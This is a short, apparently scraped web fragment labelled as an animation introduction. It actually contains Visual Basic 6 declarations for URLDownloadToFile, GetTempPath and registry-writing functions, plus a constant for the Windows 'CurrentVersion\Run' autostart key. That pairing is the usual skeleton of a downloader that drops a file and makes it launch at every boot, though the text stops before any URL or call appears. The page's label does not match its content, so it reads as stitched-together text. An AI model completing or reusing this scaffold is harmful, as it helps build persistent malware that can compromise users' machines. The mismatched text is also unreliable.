动画介绍:Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) ’延迟1秒 Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ’ Note that if you declare the lpData parameter as String, you must pass it By Value. Const Key_Run = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" Const HKEY_LOCAL_MACHINE = &H80000002 Const REG_SZ = 1 ’ Unicode nul terminated string Dim LhKey As Long | |